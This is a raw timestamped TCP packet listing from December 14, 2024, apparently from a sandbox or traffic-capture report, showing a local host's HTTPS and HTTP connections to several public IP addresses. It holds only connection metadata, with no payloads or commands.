                                                            Dec 14, 2024 10:10:50.718615055 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.767462969 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:50.775659084 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.776149035 CET49778443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:50.780618906 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.780736923 CET49778443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:50.787610054 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.787688971 CET49778443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:50.787719965 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.787750959 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.787909985 CET49778443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:50.808677912 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.812701941 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.812813997 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:50.812874079 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.819391012 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.819545031 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:50.819561958 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.832273960 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.832417965 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:50.832478046 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.832545042 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:50.838037014 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.838057041 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.838124037 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:50.851844072 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.851865053 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.851999044 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:50.851999044 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:50.852067947 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.856802940 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.856880903 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:50.856899023 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.856962919 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:50.865400076 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.865425110 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.865573883 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:50.873234987 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.873406887 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:50.873467922 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.873533964 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:50.881810904 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.881912947 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:50.886795044 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.886972904 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:50.894665956 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.894817114 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:50.898801088 CET49778443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:50.898865938 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.899610043 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.899763107 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:50.908324957 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.908519030 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:50.916143894 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.916311026 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:50.922633886 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.922893047 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:51.000767946 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:51.001030922 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:51.004192114 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:51.004348040 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:51.010358095 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:51.010516882 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:51.017530918 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:51.017608881 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:51.021119118 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:51.021181107 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:51.027714968 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:51.027795076 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:51.031580925 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:51.031655073 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:51.037792921 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:51.037864923 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:51.043210983 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:51.043282986 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:51.049082041 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:51.049171925 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:51.052572012 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:51.052648067 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:51.058273077 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:51.058351994 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:51.058382034 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:51.058545113 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:51.058546066 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:51.058582067 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:51.058613062 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:51.089518070 CET49781443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:51.089601994 CET44349781104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:51.089684963 CET49781443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:51.089946985 CET49781443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:51.089987040 CET44349781104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:51.727137089 CET49782443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:51.727189064 CET44349782104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:51.727397919 CET49782443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:51.727885962 CET49782443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:51.727900028 CET44349782104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:52.309684038 CET44349781104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:52.310101986 CET49781443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:52.310168028 CET44349781104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:52.310986996 CET44349781104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:52.311409950 CET49781443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:52.311537981 CET44349781104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:52.311580896 CET49781443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:52.354377985 CET49781443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:52.354439974 CET44349781104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:52.755136967 CET44349781104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:52.755239010 CET44349781104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:52.755373955 CET49781443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:52.756871939 CET49781443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:52.756916046 CET44349781104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:52.943779945 CET44349782104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:52.944214106 CET49782443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:52.944237947 CET44349782104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:52.945328951 CET44349782104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:52.945749044 CET49782443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:52.945915937 CET44349782104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:52.945925951 CET49782443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:52.987356901 CET44349782104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:52.988535881 CET49782443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:53.399188042 CET44349782104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:53.399468899 CET44349782104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:53.399523020 CET49782443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:53.399532080 CET44349782104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:53.399631023 CET44349782104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:53.399687052 CET49782443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:53.707650900 CET49782443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:53.707674026 CET44349782104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:53.924760103 CET49788443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:53.924860001 CET44349788104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:53.924952984 CET49788443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:53.925152063 CET49788443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:53.925175905 CET44349788104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:54.271905899 CET4974480192.168.2.468.70.164.7
                                                            Dec 14, 2024 10:10:54.392137051 CET804974468.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:55.137352943 CET44349788104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:55.137705088 CET49788443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:55.137768030 CET44349788104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:55.138305902 CET44349788104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:55.138761044 CET49788443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:55.138901949 CET44349788104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:55.139002085 CET49788443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:55.183358908 CET44349788104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:55.578747034 CET44349788104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:55.578838110 CET44349788104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:55.579180002 CET49788443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:55.580152988 CET49788443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:55.580216885 CET44349788104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:55.583302975 CET49790443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:55.583416939 CET44349790104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:55.583777905 CET49790443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:55.584033012 CET49790443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:55.584064960 CET44349790104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:56.047960997 CET49791443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:56.048048973 CET44349791104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:56.048129082 CET49791443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:56.048624992 CET49791443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:56.048681974 CET44349791104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:56.795628071 CET44349790104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:56.795885086 CET49790443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:56.795948982 CET44349790104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:56.796648026 CET44349790104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:56.797017097 CET49790443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:56.797131062 CET49790443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:56.797167063 CET44349790104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:56.837889910 CET49790443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:57.236380100 CET44349790104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:57.236485004 CET44349790104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:57.236548901 CET49790443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:57.237215996 CET49790443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:57.237258911 CET44349790104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:57.263767004 CET44349791104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:57.263995886 CET49791443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:57.264056921 CET44349791104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:57.265166044 CET44349791104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:57.265610933 CET49791443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:57.265777111 CET49791443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:57.265789986 CET44349791104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:57.265813112 CET44349791104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:57.265929937 CET49791443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:57.266040087 CET44349791104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:57.266136885 CET49791443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:57.266155958 CET44349791104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:57.881674051 CET44349791104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:57.881771088 CET44349791104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:57.882291079 CET49791443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:57.882384062 CET44349791104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:57.884633064 CET44349791104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:57.884695053 CET49791443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:57.884732962 CET44349791104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:57.891866922 CET44349791104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:57.891927004 CET49791443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:57.891941071 CET44349791104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:57.894388914 CET44349791104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:57.894526005 CET49791443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:57.894586086 CET44349791104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:57.898112059 CET44349791104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:57.898192883 CET49791443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:57.898252964 CET44349791104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:57.941598892 CET49791443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:57.941678047 CET44349791104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:57.987350941 CET49791443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:58.072700977 CET44349791104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:58.076433897 CET44349791104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:58.076494932 CET49791443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:58.076522112 CET44349791104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:58.085195065 CET44349791104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:58.085285902 CET49791443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:58.085305929 CET44349791104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:58.093089104 CET44349791104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:58.093153000 CET49791443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:58.093166113 CET44349791104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:58.101123095 CET44349791104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:58.101275921 CET49791443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:58.101288080 CET44349791104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:58.101344109 CET49791443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:58.101578951 CET49791443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:58.101608038 CET44349791104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:58.126631021 CET49797443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:58.126714945 CET44349797104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:58.126844883 CET49797443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:58.127151012 CET49797443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:58.127187967 CET44349797104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:59.348982096 CET44349797104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:59.349368095 CET49797443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:59.349431038 CET44349797104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:59.350544930 CET44349797104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:59.350869894 CET49797443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:59.350982904 CET49797443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:59.351013899 CET44349797104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:59.395992041 CET49797443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:59.790282965 CET44349797104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:59.790452003 CET44349797104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:59.790664911 CET49797443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:59.791438103 CET49797443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:59.791505098 CET44349797104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:11:02.646574974 CET4972480192.168.2.4199.232.210.172
                                                            Dec 14, 2024 10:11:02.767173052 CET8049724199.232.210.172192.168.2.4
                                                            Dec 14, 2024 10:11:02.767386913 CET4972480192.168.2.4199.232.210.172
                                                            Dec 14, 2024 10:11:02.818958998 CET49813443192.168.2.4142.250.181.132
                                                            Dec 14, 2024 10:11:02.819040060 CET44349813142.250.181.132192.168.2.4
                                                            Dec 14, 2024 10:11:02.819145918 CET49813443192.168.2.4142.250.181.132
                                                            Dec 14, 2024 10:11:02.819441080 CET49813443192.168.2.4142.250.181.132
                                                            Dec 14, 2024 10:11:02.819473982 CET44349813142.250.181.132192.168.2.4
                                                            Dec 14, 2024 10:11:04.343795061 CET49814443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:11:04.343836069 CET44349814104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:11:04.343933105 CET49814443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:11:04.344146967 CET49814443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:11:04.344166040 CET44349814104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:11:04.516968012 CET44349813142.250.181.132192.168.2.4
                                                            Dec 14, 2024 10:11:04.517252922 CET49813443192.168.2.4142.250.181.132
                                                            Dec 14, 2024 10:11:04.517316103 CET44349813142.250.181.132192.168.2.4
                                                            Dec 14, 2024 10:11:04.518407106 CET44349813142.250.181.132192.168.2.4
                                                            Dec 14, 2024 10:11:04.518838882 CET49813443192.168.2.4142.250.181.132
                                                            Dec 14, 2024 10:11:04.519061089 CET44349813142.250.181.132192.168.2.4
                                                            Dec 14, 2024 10:11:04.571976900 CET49813443192.168.2.4142.250.181.132
                                                            Dec 14, 2024 10:11:05.560597897 CET44349814104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:11:05.561006069 CET49814443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:11:05.561068058 CET44349814104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:11:05.561553955 CET44349814104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:11:05.561985016 CET49814443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:11:05.562119961 CET49814443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:11:05.562119961 CET49814443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:11:05.562129021 CET44349814104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:11:05.562179089 CET44349814104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:11:05.562416077 CET49814443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:11:05.562510014 CET44349814104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:11:06.187854052 CET44349814104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:11:06.189821959 CET44349814104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:11:06.189915895 CET44349814104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:11:06.190018892 CET49814443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:11:06.190083981 CET44349814104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:11:06.190159082 CET49814443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:11:06.192740917 CET44349814104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:11:06.192933083 CET44349814104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:11:06.193119049 CET49814443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:11:06.193198919 CET49814443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:11:06.193236113 CET44349814104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:11:06.200727940 CET49820443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:11:06.200812101 CET44349820104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:11:06.200885057 CET49820443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:11:06.201236010 CET49820443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:11:06.201319933 CET44349820104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:11:06.650315046 CET49822443192.168.2.4172.67.139.11
                                                            Dec 14, 2024 10:11:06.650398970 CET44349822172.67.139.11192.168.2.4
                                                            Dec 14, 2024 10:11:06.650506973 CET49822443192.168.2.4172.67.139.11
                                                            Dec 14, 2024 10:11:06.650738955 CET49822443192.168.2.4172.67.139.11
                                                            Dec 14, 2024 10:11:06.650765896 CET44349822172.67.139.11192.168.2.4
                                                            Dec 14, 2024 10:11:07.417757034 CET44349820104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:11:07.418345928 CET49820443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:11:07.418407917 CET44349820104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:11:07.419572115 CET44349820104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:11:07.420516968 CET49820443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:11:07.420605898 CET49820443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:11:07.420747995 CET44349820104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:11:07.475209951 CET49820443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:11:07.859510899 CET44349820104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:11:07.859694958 CET44349820104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:11:07.859906912 CET49820443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:11:07.866898060 CET44349822172.67.139.11192.168.2.4
                                                            Dec 14, 2024 10:11:07.867171049 CET49820443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:11:07.867234945 CET44349820104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:11:07.867743969 CET49822443192.168.2.4172.67.139.11
                                                            Dec 14, 2024 10:11:07.867775917 CET44349822172.67.139.11192.168.2.4
                                                            Dec 14, 2024 10:11:07.871287107 CET44349822172.67.139.11192.168.2.4
                                                            Dec 14, 2024 10:11:07.871562004 CET49822443192.168.2.4172.67.139.11
                                                            Dec 14, 2024 10:11:07.881422997 CET49822443192.168.2.4172.67.139.11
                                                            Dec 14, 2024 10:11:07.881509066 CET49822443192.168.2.4172.67.139.11
                                                            Dec 14, 2024 10:11:07.881509066 CET49822443192.168.2.4172.67.139.11
                                                            Dec 14, 2024 10:11:07.881685972 CET44349822172.67.139.11192.168.2.4
                                                            Dec 14, 2024 10:11:07.881733894 CET49827443192.168.2.4172.67.139.11
                                                            Dec 14, 2024 10:11:07.881839037 CET44349827172.67.139.11192.168.2.4
                                                            Dec 14, 2024 10:11:07.881912947 CET49822443192.168.2.4172.67.139.11
                                                            Dec 14, 2024 10:11:07.881963015 CET49827443192.168.2.4172.67.139.11
                                                            Dec 14, 2024 10:11:07.899036884 CET49827443192.168.2.4172.67.139.11
                                                            Dec 14, 2024 10:11:07.899072886 CET44349827172.67.139.11192.168.2.4
                                                            Dec 14, 2024 10:11:09.126182079 CET44349827172.67.139.11192.168.2.4
                                                            Dec 14, 2024 10:11:09.126642942 CET49827443192.168.2.4172.67.139.11
                                                            Dec 14, 2024 10:11:09.126703024 CET44349827172.67.139.11192.168.2.4
                                                            Dec 14, 2024 10:11:09.128426075 CET44349827172.67.139.11192.168.2.4
                                                            Dec 14, 2024 10:11:09.128501892 CET49827443192.168.2.4172.67.139.11
                                                            Dec 14, 2024 10:11:09.129576921 CET49827443192.168.2.4172.67.139.11
                                                            Dec 14, 2024 10:11:09.129669905 CET44349827172.67.139.11192.168.2.4
                                                            Dec 14, 2024 10:11:09.129777908 CET49827443192.168.2.4172.67.139.11
                                                            Dec 14, 2024 10:11:09.129796028 CET44349827172.67.139.11192.168.2.4
                                                            Dec 14, 2024 10:11:09.178128958 CET49827443192.168.2.4172.67.139.11
                                                            Dec 14, 2024 10:11:09.986085892 CET44349827172.67.139.11192.168.2.4
                                                            Dec 14, 2024 10:11:09.986301899 CET44349827172.67.139.11192.168.2.4
                                                            Dec 14, 2024 10:11:09.986831903 CET49827443192.168.2.4172.67.139.11
                                                            Dec 14, 2024 10:11:09.987119913 CET49827443192.168.2.4172.67.139.11
                                                            Dec 14, 2024 10:11:09.987164021 CET44349827172.67.139.11192.168.2.4
                                                            Dec 14, 2024 10:11:10.008519888 CET4974480192.168.2.468.70.164.7
                                                            Dec 14, 2024 10:11:10.128750086 CET804974468.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:11:10.130676985 CET4974480192.168.2.468.70.164.7
                                                            Dec 14, 2024 10:11:10.150512934 CET49833443192.168.2.4104.21.32.251
                                                            Dec 14, 2024 10:11:10.150595903 CET44349833104.21.32.251192.168.2.4
                                                            Dec 14, 2024 10:11:10.150686026 CET49833443192.168.2.4104.21.32.251
                                                            Dec 14, 2024 10:11:10.151036978 CET49833443192.168.2.4104.21.32.251
                                                            Dec 14, 2024 10:11:10.151074886 CET44349833104.21.32.251192.168.2.4
                                                            Dec 14, 2024 10:11:11.366164923 CET44349833104.21.32.251192.168.2.4
                                                            Dec 14, 2024 10:11:11.366633892 CET49833443192.168.2.4104.21.32.251
                                                            Dec 14, 2024 10:11:11.366694927 CET44349833104.21.32.251192.168.2.4
